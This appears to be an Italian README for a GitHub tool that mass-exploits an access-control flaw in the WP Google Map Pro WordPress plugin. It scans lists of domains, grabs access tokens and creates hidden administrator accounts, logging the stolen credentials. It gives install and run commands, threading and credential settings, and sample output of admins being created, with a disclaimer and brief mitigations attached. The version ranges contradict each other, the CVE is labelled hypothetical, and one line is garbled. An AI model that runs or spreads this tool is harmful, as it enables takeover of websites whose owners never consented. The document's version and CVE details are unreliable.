
WP Maps Pro <= 6.1.0 - Elevazione dei privilegi non autenticata tramite creazione di un account amministratore per l'azione AJAX wpgmp_temp_access_ajax
Questo strumento sfrutta CVE-2026-8732, una vulnerabilità nel plugin WP Google Map Pro per WordPress. La vulnerabilità consente a un utente malintenzionato non autenticato di ottenere un wpmp_token valido tramite un endpoint AJAX (admin-ajax.php?action=wpgmp_temp_access_ajax). Utilizzando questo token, un attaccante può accedere al pannello di amministrazione di WordPress e creare un nuovo utente amministratore.
Lo strumento esegue una scansione di massa a partire da un elenco di domini, estrae il nonce e il token e crea automaticamente un account amministratore nascosto sui siti vulnerabili. I risultati vengono salvati in tempo reale con tutti i dettagli del token.
⚠️ AVVERTENZA: Questo strumento è destinato esclusivamente a test di sicurezza autorizzati e a scopo educativo. Utilizzalo solo su sistemi di tua proprietà o per i quali hai un'autorizzazione esplicita a testare. L'autore non è responsabile di eventuali usi impropri.
Per maggiori avvertenze, puoi consultare il disclaimer nella pagina di Jenderal92. Puoi verificarlo QUI !!!
admin_created.txthttp:// che https://requestsInstalla la libreria richiesta:
pip install requests
🚀 Installazione
git clone https://github.com/Jenderal92/CVE-2026-8732.git
cd CVE-2026-8732
🎯 Utilizzo
Prepara un file con l'elenco dei target (un dominio per riga):
example.com
https://target-website.com
http://vulnerable-site.org
Esegui lo scanner:
python2 exploit.py targets.txt
File di output
File Contenuto res.txt Domini vulnerabili con token completo e URL di reindirizzamento (se presente) admin_created.txt Credenziali admin create con successo (dominio, nome utente, password, email)
Esempio di output
[*] Checking: https://example.com
[VULNERABLE] https://example.com -> Token found
[*] https://example.com -> Accessing redirect URL...
[+] https://example.com -> Admin created: securityaudit_1734567890 / StrongP@ssw0rd123!
⚙️ Configurazione
Modifica le seguenti variabili all'interno dello script:
TIMEOUT = 10 # Request timeout in seconds
JUMLAH_THREAD = 10 # Number of concurrent threads
OUTPUT_FILE = "res.txt" # File for vulnerable results
ADMIN_FILE = "admin_created.txt"
BASE_USERNAME = "securityaudit"
NEW_PASSWORD = "StrongP@ssw0rd123!"
NEW_EMAIL = "[email protected]"
🧠 Come funziona
🛡️ Mitigazione
· Aggiorna WP Google Map Pro all'ultima versione corretta disponibile. · Disattiva l'azione AJAX wpgmp_temp_access_ajax tramite codice personalizzato o firewall. · Utilizza un Web Application Firewall (WAF) per bloccare le richieste dannose verso admin-ajax.php.
⭐ Avvertenza
Questo software è fornito "COSÌ COM'È" senza alcuna garanzia. L'intero rischio relativo alla qualità e alle prestazioni del software è a tuo carico. Usalo in modo responsabile e solo su sistemi su cui sei autorizzato a testare.
| Campo | Valore |
|---|
| CVE ID | CVE-2026-8732 (ipotetico per questo plugin) |
| Plugin interessato | WP Google Map Pro (versioni <= 1.5.0) |
| Tipo di vulnerabilità | Controllo degli accessi non corretto / Escalation dei privilegi |
| Vettore di attacco | Non autenticato, Remoto |
| Impatto | Compromissione totale del sito tramite creazione di un account admin |